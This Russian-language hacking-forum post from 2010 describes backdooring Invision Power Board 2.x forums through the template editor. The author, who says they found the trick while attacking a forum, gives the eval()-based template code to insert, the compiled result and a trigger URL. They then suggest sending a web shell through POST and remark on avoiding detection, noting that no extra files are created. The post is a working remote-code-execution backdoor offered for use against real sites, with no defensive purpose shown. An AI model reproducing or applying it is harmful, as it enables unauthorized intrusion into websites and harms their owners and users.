Показать сообщение отдельно
Старый 24.09.2010, 16:25   #12
Белый Тигр
 
Аватар для Белый Тигр
 
Регистрация: 29.08.2010
Сообщений: 153
Репутация: 25
По умолчанию

IPB 2.* (возможно и на 3 покатит, не проверял)
Нашёл в процессе пыток одного форума (версия 2.3.6). Все перчисленные здесь варианты я пробовал, но они обламывались следующим:
1. На сервере как php-скрипты опознавались только .php-файлы. То есть заливка через фото phtml/php3/php5/и т.д.-файлов не помогала.
2. У меня были права обычного администратора, а не главного. Так что я не мог работать с SQL-инструментарием и вбивать PHP-код в настройки форума.
И на помощь вдруг пришли шаблоны Вообщем заходим в редактирование текущего дизайна (или любого, если пользователи сами могут выбирать себе внешний вид), выбираем любой шаблон. Я выбрал skin_global/global_header. В него пишем следующее:
Цитата:
<if="$this->ipsclass->input['testKey'] = 123">
<if="eval($this->ipsclass->input['code'])"></if>
</if>
Я поместил это сразу после
Цитата:
<!--ipb.javascript.start-->
После сохранения шаблона, в кеш-файле данный код превращается в
Цитата:
$IPBHTML .= "<!--ipb.javascript.start-->
" . (($this->ipsclass->input['testKey'] = 123) ? ("
<h1>" . ((eval($this->ipsclass->input['code'])) ? ("") : ("")) . "</h1>
") : ("")) . "
...тут идёт основной JS-код...
Теперь обращаемся например вот так -
/index.php?testKey=123&code=phpinfo();
Видим phpinfo. После этого можно смело писать эксплоит который в code POST-методом будет пересылать код шелла.
Плюс метода в том, что он не создаёт лишних файлов.
Минус - дизайн отмечается как изменённый. Хотя если он уже изменялся владельцами и имеет такую отметку, то можно не беспокоиться.
Белый Тигр вне форума   Ответить с цитированием